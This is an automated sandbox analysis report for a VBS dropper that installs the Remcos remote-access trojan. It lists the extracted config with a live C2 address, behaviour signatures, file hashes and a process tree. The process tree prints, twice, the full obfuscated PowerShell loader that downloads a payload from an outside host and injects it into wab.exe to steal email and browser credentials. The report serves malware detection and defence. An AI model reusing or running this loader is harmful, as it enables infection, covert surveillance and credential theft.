Overview

overview

10

Static

static

1

a1b94e324b...04.vbs

windows7-x64

10

a1b94e324b...04.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/07/2024, 08:59

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    a1b94e324beb19da2cabb254652df7c75dfcdad3c099012bb10e06448198d204.vbs

  • Size

    22KB

  • MD5

    8e3c190eff5e1e796f9cd8ac0eb18d0b

  • SHA1

    751c299c930a6975b1f311c3d645554d0cfe8654

  • SHA256

    a1b94e324beb19da2cabb254652df7c75dfcdad3c099012bb10e06448198d204

  • SHA512

    a83264a4fce9bcfb6be07acf57e3122fb6b3d4e6efe43c014da59b49d8809d6a51c898077243c1c953fbf2b25453968972b5ca29c9eefa4dbebcb3384db83a06

  • SSDEEP

    384:w2+0bMHc3lcf0ghreYjfrPQ8dmc6qRloM9zKzUn/r:y0cc3yfdNTY8dnbEUnT

Score
10/10
remcosremotehostcollectionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

103.237.87.32:1999

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-VEYV6I

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
    collection
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a1b94e324beb19da2cabb254652df7c75dfcdad3c099012bb10e06448198d204.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloFS ellaciDigynialInbardgt Rd inge Sparekn Demate=Skibspr$ pr ekrJHolmganurecalibd Conti.a Fari.eeTelefonoAr metepMosekonhSkv.tsmo StakorbbreedsgiSygebe asitem d.Skr.nkesSteroedpc,tadiclHemaspei filetkt c ment(Arenigr$DeparteTFrabedeuSvikmllbdiglerheEchiteslTilmeldiRepris.kMyxinideAfdrags1dusinkj9Ops.nin3Salpaern EftermsAfb.egeuMikalaieAutomektShipfituOvertegd allyide Bombsi) dariot ');Venerator (Charcuteries 'Halatio[ Strim N.rkivkoe FemtentBriza,n.ModulerSCrownp eEmbusqurTrgrnsevBu,squii MandilcSexfilmeStraahaP CrepyboHiccupiiAnpartenOzonisetOxtersrMS,mvittaHomoeopnNo,ograaBookmakgHomogene.llenderSkriv,s]Fadsers:Vir som:Tor,edaS CombedeJocoquicWa.tsekuincons rUlasteliStatssktSaddeltyGru,vrkP Patri.rRussop oSo,ospitUslgelio gnosyncSuperbuoGlansrolDisp.ns Udpolst=E,eltof androge[elaboraNnige.suereassoctUnri dl.CultrifSLionelseLackerscMakroneuNonreclrC.anettispyflu.tIdi.sepy UnrecoPIrrecovrKvadratoGraastetForflyto Aff jecArchgeno NondemlBog.andTBlindgayShufflepinstitueGravrer]ripplet:Deempha:EkstatiTDestinelMegalo s Acetyl1Spiders2konvers ');$Judaeophobia=$Filten[0];$Forestaller= (Charcuteries 'Futonch$ utshigLitigatlProrescoSkindkrbbu leskaDat.erslRetsple:Esb,ergISpindplnPrislagtMuldva,eGrydersrShaga.aa bal,ngdFranchivVarmefyeMerrymanNat,onatKobberbuSubsetsaUdbr.delGainc,p=resurreNFlyvebieAn,aldtwBastard- E,vorpOfeltsenbGudsforj T.ojkae Undertc gat ert.mirtle RwanderS,ekonstyDngesansTotipott Pascale U dladmGeneral. Man riNRistorneResumedtSlamb,n. Car ioWMilieuteFeilspobConsignCFler,rulChremzliStrudsee Om,lagn.adiosot');$Forestaller+=$Praesternes[1];Venerator ($Forestaller);Venerator (Charcuteries 'Kri,esi$UnupbraISubs rinCanvasetSkovvogeDruidicrUltr,moa civilddHypochnv SkovsvePer,onknP.odukttKlavrinu,ebarraaProustil Embolo.SpartanHHonouraeAube.tbaBrev,krdNe riveePac retr.phelios ,raftv[Sowtvaa$EuropapS,tedsebw Invi.ciHusvalenAccentub FotogeuGalvanorFortry.nSaluth iDi phanaAr.iculn Sammen]Stemnin=Observa$AforedaRSchreibeTirmautsHerreliiMuhlypunApokry.a Grundf ');$uslebnes=Charcuteries ' Hoveds$st,digeIM dviljnFejdenstParacene FirmamrMiasmsiaSjlesrgd LededavubedrageFeeblehnSnrelidtL,jesveuKrybskya.rodderl Fljlsk.OctopedDDeliriso astervwKlapp,rnMorularlIng.edioLabyrinaIn,ercodBaroktsFTr nsmiiPrevisil.ellaree T unde(,rundve$ B.ggegJDogieovu .ortsedUfattelaMikkelaebl,sensoCost,trpEchoedph,matrryoSuperinbCarbureiFondsboa nichtu,Ny.nstt$TilpasnS.irksomo Neu.trePara elgHfligheeAceratetnosetioi D slgedJournal) Neglec ';$Soegetid=$Praesternes[0];Venerator (Charcuteries 'Lumtupe$DahliasgMegalodlKasse,poPlateasbanstukka LeucoslColdsl,:C,eirosO Porp yvDuggenseRorschar NivellpGust,iseLigestir WallopsBonderouUtilgngaSigillidNytt.nreB asens= Veksli( SknsmaTDragoo.eLangootsAutonomt.ejruds-BindselPSe.itroabrofogetKontrolh Prosob Requite$ ResearSMono,ypoAktiviteSta dargDigtnine Demuretnecrot.iso testd Overdr) Hecate ');while (!$Overpersuade) {Venerator (Charcuteries ' Surpli$Unsnugng LiderllVerdensoEry.hembGa,afacaU.efruglFordyre: P.nserA,rotektfPoodlesvLge,idei,agflikkImbecillTiltspaiI,dkaldnCheesingVidt,ersRinserst Fana,iidivisesd He.bace larebonHegled,sDialogf= quizzi$ ChienctB,mlespr SymptouImmunise delete ') ;Venerator $uslebnes;Venerator (Charcuteries 'MatchmaS MargartPrevaliaGennem,r QuetsctTjenstl- bruddeSForlys,l Dun,teeBrachyueQuadrimpDoethpr He,viso4Lederla ');Venerator (Charcuteries '.iperin$ karlekgWitherwl.plininoU ludnib Rumo sapyrrolel.elbeha:falmestOHyperbevAftoppeeBertramrKloakerpBa.kfireDrbtesorfondates IsolatuMistnkeaAjugasfd .isioneGove,nm=bullerp( onocotTRonrebreM.skulasLaanekatWegotis- RussopPFjendskaHoftenst Naigueh Eudoxi At ngle$UnenumeSchefpiloPi terneGasturbgTeate seDripolatrepetitiSrprge d filica) Indret ') ;Venerator (Charcuteries 'Flywhee$ManassegAleksanlInuitisoOp thalbD markaaGlos.oclNonimpe:Rekalk AStudsetfChefkokhDyophysa AcranieBlomst,no.stningRetorikiMarijnpg T,abenhTrivialeSh.pkeedAktivissk uldasfmicrophoRepressrRoskil.h ReturpoEurydicl tarifedBlo.ket=No,prot$Sti.karg ModstnlSonnetioSyng nebGodt.oeaTriperslKilahca: ransgrREnergimoopvartnwE.ighedtUdbindeh oprr s+Gossypi+Preind %Anony,i$ TornesFheartiliForsgsslOctahedt BrnekueSnobbernLandshe.NouskencDev.luao RenegauBarnesdn Sejrretpalpig ') ;$Judaeophobia=$Filten[$Afhaengighedsforhold];}$Substanced=338360;$Destructors=30531;Venerator (Charcuteries 'Ubetnks$Anti,lagBlle.osl ArabisoTekst,eb Innisiapreworll Tabelb:PolyneuS Rt blgkQueru.oy ucleolUdliggeiTobaksrn TnderhiunderhanMewerpogTreskib Sangaa,=Iagttag Kro.stGBugtaleeG,ehvidt Mosqui-MurinaeCslidseno Udklann GepeootTotaquieA faldsn Overlot abilit Lacus.$ rosaisS Antit oBemadameSaddelgg,enochoeJoi.twotAffekt i Parkerd egati ');Venerator (Charcuteries ' Charco$Chan.elgM rrainlAjourfooTidsstabjusbuttaArchi,elproport:SploshyMhomoiouiG,rranesUnderbusMartialiKompagns Salpet unuse u=Keyerpr infanta[AfhndelS Dextroy sludresMulctattSkoleekeS.aaligmhystade.JardineC MetodioMeta odnFranskmvIrratioe Sve.ker EutanatDameagt]Fysiurg: Vipper:Pre astF Skindhr fkldnojuncturmBenedicBPaasejlaUdlaanssIldebefeblaatop6Unprofu4ZaffersSFrijol,tSufflamrUnderaci EllevenTransmugSyskens(Entomop$kamarilS ,odillkBillig,yFrognoslAnhydcuienigmatnAffereniDodecasnBespottgAudiofo)R alist ');Venerator (Charcuteries 'Ekstern$UnsketjgR,ngleslFerrimaoFlakon b misshaa Somatol,eltman:NonvocaJDisincluVolubilvDepersoeForeholnTop.manoHeddaanlT skelpaVg.ontat ihramsrHitc.esyTaperyp Dyrtids=Ro.ator Coexte[ stroboSund.aafySprawlssParcenetAddend e Su.fermProg.am.Giraf oT CavidaeUngodlixUnpop,ltBisamme.dybdeboESeverinnunds,elcLkkerbiorapunsldNisus yiBjergtun Di,kvagCarious].unktio:Afbryd.: PromotA Fr,tehSSpidsbeCUnconstIRidderrIHousele.N.nadveG SpndeteUnprofot D.sarrSVasospat T gnesrUmo aliiMakluk nLig.gylgfortysk(Ma.kins$RekvisiMSpeakeriTvesindsdiffracsSkil.reiUdveje.sSkydkk.)Kundska ');Venerator (Charcuteries ' legiac$Ch.rkedgHumanisl boldheoaabenplb SupersaSupplerlLaenker:AlbanskCIrrisoraBramsejpeksamenrLaneykii AfsikrnDetox.diDataudvcGeneral=K.kotte$RetstavJFia.kosuParasitvFyr geseSefekhenfarsretoFiresidl Ida inaRevellitBickerernettoo yAcetoni.sapansysSlgersluRed,ktibB ygninsInboardtDelousermenneskiBegyndenImproprgNederde(Gravere$ VestenSPotophoufiftiesbBak.warsSkkestotAfsaaalakristofn Incorpcune.tere arethudIberegn,Paean z$.inchesDomform eFerments MythoctVectorirtin estuLi.uryacSc.naritTrass,roMineralrLeukonesDialogi)Foedee. ');Venerator $Caprinic;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1272
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
        3⤵
          PID:4424
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlBennetdoChromopbBlistenardgrd nlbo pisr:WindbloFS ellaciDigynialInbardgt Rd inge Sparekn Demate=Skibspr$ pr ekrJHolmganurecalibd Conti.a Fari.eeTelefonoAr metepMosekonhSkv.tsmo StakorbbreedsgiSygebe asitem d.Skr.nkesSteroedpc,tadiclHemaspei filetkt c ment(Arenigr$DeparteTFrabedeuSvikmllbdiglerheEchiteslTilmeldiRepris.kMyxinideAfdrags1dusinkj9Ops.nin3Salpaern EftermsAfb.egeuMikalaieAutomektShipfituOvertegd allyide Bombsi) dariot ');Venerator (Charcuteries 'Halatio[ Strim N.rkivkoe FemtentBriza,n.ModulerSCrownp eEmbusqurTrgrnsevBu,squii MandilcSexfilmeStraahaP CrepyboHiccupiiAnpartenOzonisetOxtersrMS,mvittaHomoeopnNo,ograaBookmakgHomogene.llenderSkriv,s]Fadsers:Vir som:Tor,edaS CombedeJocoquicWa.tsekuincons rUlasteliStatssktSaddeltyGru,vrkP Patri.rRussop oSo,ospitUslgelio gnosyncSuperbuoGlansrolDisp.ns Udpolst=E,eltof androge[elaboraNnige.suereassoctUnri dl.CultrifSLionelseLackerscMakroneuNonreclrC.anettispyflu.tIdi.sepy UnrecoPIrrecovrKvadratoGraastetForflyto Aff jecArchgeno NondemlBog.andTBlindgayShufflepinstitueGravrer]ripplet:Deempha:EkstatiTDestinelMegalo s Acetyl1Spiders2konvers ');$Judaeophobia=$Filten[0];$Forestaller= (Charcuteries 'Futonch$ utshigLitigatlProrescoSkindkrbbu leskaDat.erslRetsple:Esb,ergISpindplnPrislagtMuldva,eGrydersrShaga.aa bal,ngdFranchivVarmefyeMerrymanNat,onatKobberbuSubsetsaUdbr.delGainc,p=resurreNFlyvebieAn,aldtwBastard- E,vorpOfeltsenbGudsforj T.ojkae Undertc gat ert.mirtle RwanderS,ekonstyDngesansTotipott Pascale U dladmGeneral. Man riNRistorneResumedtSlamb,n. Car ioWMilieuteFeilspobConsignCFler,rulChremzliStrudsee Om,lagn.adiosot');$Forestaller+=$Praesternes[1];Venerator ($Forestaller);Venerator (Charcuteries 'Kri,esi$UnupbraISubs rinCanvasetSkovvogeDruidicrUltr,moa civilddHypochnv SkovsvePer,onknP.odukttKlavrinu,ebarraaProustil Embolo.SpartanHHonouraeAube.tbaBrev,krdNe riveePac retr.phelios ,raftv[Sowtvaa$EuropapS,tedsebw Invi.ciHusvalenAccentub FotogeuGalvanorFortry.nSaluth iDi phanaAr.iculn Sammen]Stemnin=Observa$AforedaRSchreibeTirmautsHerreliiMuhlypunApokry.a Grundf ');$uslebnes=Charcuteries ' Hoveds$st,digeIM dviljnFejdenstParacene FirmamrMiasmsiaSjlesrgd LededavubedrageFeeblehnSnrelidtL,jesveuKrybskya.rodderl Fljlsk.OctopedDDeliriso astervwKlapp,rnMorularlIng.edioLabyrinaIn,ercodBaroktsFTr nsmiiPrevisil.ellaree T unde(,rundve$ B.ggegJDogieovu .ortsedUfattelaMikkelaebl,sensoCost,trpEchoedph,matrryoSuperinbCarbureiFondsboa nichtu,Ny.nstt$TilpasnS.irksomo Neu.trePara elgHfligheeAceratetnosetioi D slgedJournal) Neglec ';$Soegetid=$Praesternes[0];Venerator (Charcuteries 'Lumtupe$DahliasgMegalodlKasse,poPlateasbanstukka LeucoslColdsl,:C,eirosO Porp yvDuggenseRorschar NivellpGust,iseLigestir WallopsBonderouUtilgngaSigillidNytt.nreB asens= Veksli( SknsmaTDragoo.eLangootsAutonomt.ejruds-BindselPSe.itroabrofogetKontrolh Prosob Requite$ ResearSMono,ypoAktiviteSta dargDigtnine Demuretnecrot.iso testd Overdr) Hecate ');while (!$Overpersuade) {Venerator (Charcuteries ' Surpli$Unsnugng LiderllVerdensoEry.hembGa,afacaU.efruglFordyre: P.nserA,rotektfPoodlesvLge,idei,agflikkImbecillTiltspaiI,dkaldnCheesingVidt,ersRinserst Fana,iidivisesd He.bace larebonHegled,sDialogf= quizzi$ ChienctB,mlespr SymptouImmunise delete ') ;Venerator $uslebnes;Venerator (Charcuteries 'MatchmaS MargartPrevaliaGennem,r QuetsctTjenstl- bruddeSForlys,l Dun,teeBrachyueQuadrimpDoethpr He,viso4Lederla ');Venerator (Charcuteries '.iperin$ karlekgWitherwl.plininoU ludnib Rumo sapyrrolel.elbeha:falmestOHyperbevAftoppeeBertramrKloakerpBa.kfireDrbtesorfondates IsolatuMistnkeaAjugasfd .isioneGove,nm=bullerp( onocotTRonrebreM.skulasLaanekatWegotis- RussopPFjendskaHoftenst Naigueh Eudoxi At ngle$UnenumeSchefpiloPi terneGasturbgTeate seDripolatrepetitiSrprge d filica) Indret ') ;Venerator (Charcuteries 'Flywhee$ManassegAleksanlInuitisoOp thalbD markaaGlos.oclNonimpe:Rekalk AStudsetfChefkokhDyophysa AcranieBlomst,no.stningRetorikiMarijnpg T,abenhTrivialeSh.pkeedAktivissk uldasfmicrophoRepressrRoskil.h ReturpoEurydicl tarifedBlo.ket=No,prot$Sti.karg ModstnlSonnetioSyng nebGodt.oeaTriperslKilahca: ransgrREnergimoopvartnwE.ighedtUdbindeh oprr s+Gossypi+Preind %Anony,i$ TornesFheartiliForsgsslOctahedt BrnekueSnobbernLandshe.NouskencDev.luao RenegauBarnesdn Sejrretpalpig ') ;$Judaeophobia=$Filten[$Afhaengighedsforhold];}$Substanced=338360;$Destructors=30531;Venerator (Charcuteries 'Ubetnks$Anti,lagBlle.osl ArabisoTekst,eb Innisiapreworll Tabelb:PolyneuS Rt blgkQueru.oy ucleolUdliggeiTobaksrn TnderhiunderhanMewerpogTreskib Sangaa,=Iagttag Kro.stGBugtaleeG,ehvidt Mosqui-MurinaeCslidseno Udklann GepeootTotaquieA faldsn Overlot abilit Lacus.$ rosaisS Antit oBemadameSaddelgg,enochoeJoi.twotAffekt i Parkerd egati ');Venerator (Charcuteries ' Charco$Chan.elgM rrainlAjourfooTidsstabjusbuttaArchi,elproport:SploshyMhomoiouiG,rranesUnderbusMartialiKompagns Salpet unuse u=Keyerpr infanta[AfhndelS Dextroy sludresMulctattSkoleekeS.aaligmhystade.JardineC MetodioMeta odnFranskmvIrratioe Sve.ker EutanatDameagt]Fysiurg: Vipper:Pre astF Skindhr fkldnojuncturmBenedicBPaasejlaUdlaanssIldebefeblaatop6Unprofu4ZaffersSFrijol,tSufflamrUnderaci EllevenTransmugSyskens(Entomop$kamarilS ,odillkBillig,yFrognoslAnhydcuienigmatnAffereniDodecasnBespottgAudiofo)R alist ');Venerator (Charcuteries 'Ekstern$UnsketjgR,ngleslFerrimaoFlakon b misshaa Somatol,eltman:NonvocaJDisincluVolubilvDepersoeForeholnTop.manoHeddaanlT skelpaVg.ontat ihramsrHitc.esyTaperyp Dyrtids=Ro.ator Coexte[ stroboSund.aafySprawlssParcenetAddend e Su.fermProg.am.Giraf oT CavidaeUngodlixUnpop,ltBisamme.dybdeboESeverinnunds,elcLkkerbiorapunsldNisus yiBjergtun Di,kvagCarious].unktio:Afbryd.: PromotA Fr,tehSSpidsbeCUnconstIRidderrIHousele.N.nadveG SpndeteUnprofot D.sarrSVasospat T gnesrUmo aliiMakluk nLig.gylgfortysk(Ma.kins$RekvisiMSpeakeriTvesindsdiffracsSkil.reiUdveje.sSkydkk.)Kundska ');Venerator (Charcuteries ' legiac$Ch.rkedgHumanisl boldheoaabenplb SupersaSupplerlLaenker:AlbanskCIrrisoraBramsejpeksamenrLaneykii AfsikrnDetox.diDataudvcGeneral=K.kotte$RetstavJFia.kosuParasitvFyr geseSefekhenfarsretoFiresidl Ida inaRevellitBickerernettoo yAcetoni.sapansysSlgersluRed,ktibB ygninsInboardtDelousermenneskiBegyndenImproprgNederde(Gravere$ VestenSPotophoufiftiesbBak.warsSkkestotAfsaaalakristofn Incorpcune.tere arethudIberegn,Paean z$.inchesDomform eFerments MythoctVectorirtin estuLi.uryacSc.naritTrass,roMineralrLeukonesDialogi)Foedee. ');Venerator $Caprinic;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1340
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
            4⤵
              PID:2568
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2812
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dotjyuowojwnokdjkafwkgtlurxwwnhtg"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:456
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nqycz"
                5⤵
                • Accesses Microsoft Outlook accounts
                PID:1004
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ykmvaekr"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3176
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vitumai"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3000
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\flzmnssgdy"
                5⤵
                • Accesses Microsoft Outlook accounts
                PID:2632
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qfmxoldzrggav"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4968

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\remcos\logs.dat
              Filesize

              144B

              MD5

              72dd8eeb1ec913fa687feb474ece1870

              SHA1

              b24e9400d2f84f587723035c868fc37627277c6e

              SHA256

              2fd889f2c171f89f26013663d41a9c0cfe9f99e342e2a345334dc8e60287e33c

              SHA512

              e343510ce3ef99821b62942bbf013161122814b0069328aa19987a7319d72cc790ecbf48f414769a5360d07a4a460ab39a551616a1f01efb10800a99eaa97b98

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jxwueh1m.vv0.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

